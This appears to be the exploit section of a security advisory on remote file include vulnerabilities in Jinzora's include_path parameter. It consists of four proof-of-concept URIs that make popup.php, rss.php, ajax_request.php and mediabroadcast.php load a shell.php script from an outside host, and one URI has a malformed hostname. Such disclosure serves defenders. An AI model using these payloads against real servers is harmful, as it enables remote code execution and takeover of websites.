• info
• discussion
• exploit
• solution
• references

Jinzora Include_Path Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/popup.php?include_path=http://www.example2.com.com/shell.php?
http://www.example.com/rss.php?include_path=http://www.example2.com.com/shell.php?
http://www.example.com/ajax_request.php?include_path=http://www.example2.com.com/shell.php
http://www.example.commediabroadcast.php?include_path=http://www.example2.com.com/shell.php?